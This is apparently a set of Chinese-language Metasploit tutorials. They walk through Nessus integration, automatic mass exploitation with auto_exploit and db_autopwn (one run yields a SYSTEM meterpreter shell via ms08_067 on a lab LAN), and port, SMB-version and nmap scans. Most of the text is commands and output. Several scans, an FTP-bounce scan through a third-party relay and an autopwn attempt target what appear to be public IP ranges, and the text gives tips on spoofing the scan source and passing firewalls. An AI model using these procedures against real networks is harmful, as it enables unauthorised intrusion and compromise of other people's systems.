  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +—————————+—————————+
  |      o O o                |        \’\/\/\/’/         |
  |              o O          |         )======(          |
  |                 o         |       .’  LOOT  ‘.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |””\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)”””**|(@)(@)**|(@) |    ”       ||       ”     |
  |  = = = = = = = = = = = =  |     ‘————–‘      |
  +—————————+—————————+
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ — –=[ 831 exploits – 470 auxiliary – 143 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
——-                    ———
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]

连接上nessus

msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >

nessus user添加一个nessus用户

msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added

查看用户列表

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970

我们发现 xxxooo不是admin 我们提升为admin

root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#

现在在来看看user

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >

选择一种扫描规则

msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
—  —-                                         ——–
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called “fuck” and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd

查看扫描状态

msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
——-                                               —-  —–    ——-            ——   ————-  ———–
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >

查看扫描报告列表

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

扫描完之后status会completed

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

查询指定扫描报告详细

msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
——–     ——–  —–  —–  —–  —–  —————-  ————–
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >

列出指定IP的扫描结果

msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
—-  ——–  ——–  ————   —–  —–  —–  —–
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >

查看指定IP地址指定端口扫描详细

msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
—-              ——–  ——–  ———–                                                                                                     —–  ——–  —                ———–  ———–
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      [“CVE-2005-1794”]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      [“CVE-2012-0002”]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >

导入一个扫描报告

msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

查看扫描结果hosts

msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
——-       ——-                   ———  —–  —–
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48

查看扫描到的主机漏洞

msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915

…….略

我们也可以是用auto_exploit进行批量溢出
开启postgresql 创建一个数据库

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
用户 postgres 的口令:
psql (8.4.10)
SSL连接 (加密:DHE-RSA-AES256-SHA,位元:256)
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

msf连接postgresql

msf > db_status
[*] postgresql connected to msf3dev
msf > db_connect postgres:123456@localhost:5432/fuck

查看nessus报告 并导入一个报告

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

加载auto_exploit,执行vuln_exploit溢出

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP’s and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit ruby问题略

或者用db_autopwn好点

msf > load db_autopwn
msf > db_autopwn -t -e -p
………….略
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  —  —-                   ———–                            ———-                                            —
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  —  —-                   ———–                            ———-
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1…

auto_exploit.rb:auto_exploit

metasploit中scanner的使用抛砖|portscanner && scanner/smb/smb_version 的使用

端口扫描工具:

[bash]

msf > search portscan

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
msf >

[/bash]

上述各种端口扫描工具使用方法大同小异,只是扫描的类型 和 目的各不相同. 要灵活使用.

以其中的一种为例子:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name Current Setting Required Description
—- ————— ——– ———–
BOUNCEHOST yes FTP relay host
BOUNCEPORT 21 yes FTP relay port
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

portscan的其他的工具使用方法类似.

扫描目标主机的操作系统类型:

smb:  server message block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/smb/pipe_auditor normal SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2 normal SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares normal SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers normal SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login normal SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid normal SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf >

[/bash]

以smb/smb_version的使用如下,可用以列举服务器的操作系统.一般来讲是扫描不出来的.这丫的漏洞都掉牙的. 再破的服务器都补上这洞了.

但是在渗透personal computer的时候,这个命令是很有用的.一般都可以扫出操作系统类型.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS 108.171.217.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1024 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

metasploit中nmap扫描例解

查看metasploit数据库连接状态.metasploit4.0以后版本都自动连接自带数据库.所以,象之前那样load db_mysql然后db_connet没有必要了.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

想要查看db_开头的命令,输入db_连按两下tab健,出如下信息.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

当然,使用help命令未尝不可.

[bash]

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================

Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

msf >

[/bash]

db_nmap用于对主机端口扫描和服务的发现.常用参数如下:

-A : 深层次扫描

-sS : 试图在扫描时隐藏自己.  和 -sI  某ip   这个参数不能同时使用

-sI  某ip:  使用这个”某ip”作为自己扫描时的ip,别人在查看的时候只能发现时这个某ip在扫描他

-oX 文件名 : 把扫描结果导出到 “文件名”文件.  以便于在metasploit中使用db_import来导入这个结果,然后就可以使用db_autopwn来自动入侵拉,对吧

-Pn :  不经过ping . 在扫描之前不使用ping来判断主机是否存活.在longlong ago . ping来判断主机是否存活是可行可靠的.但是自从某牛发现使用

ping可以发起ddos攻击之后,就对ping协议进行了改进和预防.所以,有时候ping不到主机并不代表主机down. 你懂得.

对了还有一个重要的参数:

-v   :显示扫描进度. 否则你会以为nmap死掉了,而不耐烦把它ctrl – c掉..

 

那么, 一个常用的扫描命令例子:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

#省略一大块

[/bash]

然后就是

db_import ieroot

ieroot文件是上面nmap扫描的结果嘛.

然后就是:

load db_autopwn

db_autopwn来自动扫描可利用主机了.

db_autopwn的几个常用参数来说明一下:

-e : 对数据库中扫描结果中的每一个主机都发起攻击

-t : 显示所有匹配的模块

-r : 使用reverse连接,反向连接. 反向连接有好处阿. 穿防火墙就用这个参数了

-x : 根据漏洞来选择攻击模块

-p : 根据端口选择攻击模块. 有很多主机把自己的服务的端口改的一塌糊涂.这个时候用-p要慎重哦

所以.过程如下:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–

msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

session不容易得到阿. 如果得到就使用 session -i 1 来连接第一个session. 其他依次. 得到shell就没有什么好说得了.